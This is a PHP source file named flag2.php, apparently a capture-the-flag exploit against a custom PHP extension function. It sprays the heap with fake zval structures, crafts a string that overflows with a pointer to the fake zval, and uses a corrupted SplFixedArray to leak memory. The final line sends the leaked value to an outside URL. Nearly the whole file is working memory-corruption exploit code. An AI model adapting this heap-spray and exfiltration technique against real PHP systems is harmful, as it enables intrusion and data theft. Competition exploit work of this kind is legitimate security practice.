-
Notifications
You must be signed in to change notification settings - Fork 33
/
flag2.php
51 lines (42 loc) · 1.1 KB
/
flag2.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
<?php
$payload = str_repeat('a', (1<<26));
for ($i = 0; $i < (1<<26); $i += 0x1000) {
// value.str.val
$payload[$i] = "\x80";
$payload[$i+1] = "\x90";
$payload[$i+2] = "\x3a";
$payload[$i+3] = "\xf7";
// value.str.len
$payload[$i+4] = "\x40";
$payload[$i+5] = "\0";
$payload[$i+6] = "\0";
$payload[$i+7] = "\0";
// refcount__gc
$payload[$i+8] = "\1";
$payload[$i+9] = "\0";
$payload[$i+10] = "\0";
$payload[$i+11] = "\0";
// type
$payload[$i+12] = "\x06";
// reference flag
$payload[$i+13] = "\0";
$payload[$i+14] = "\0";
$payload[$i+15] = "\0";
}
$name = str_repeat('a', 502);
// number of non-dot characters
$n = 513;
$text = str_repeat('.', (1<<23) - ($n / 513) + $n);
for ($i = 16871; $i < 16871 + 25; ++$i)
$text[$i] = 'a';
// reliable pointer to our fake ZVal
$text[16871 + 25] ="\x18";
$text[16871 + 26] ="\x10";
$text[16871 + 27] ="\x01";
$text[16871 + 28] ="\xf3";
$i += 4;
for (;$i < 16871 + 513; ++$i)
$text[$i] = 'a';
$victim = new SplFixedArray(1<<21);
hastur_ia_ia_handler($text, $name);
file_get_contents('https://kitctf.de/win/'. urlencode($victim[0]));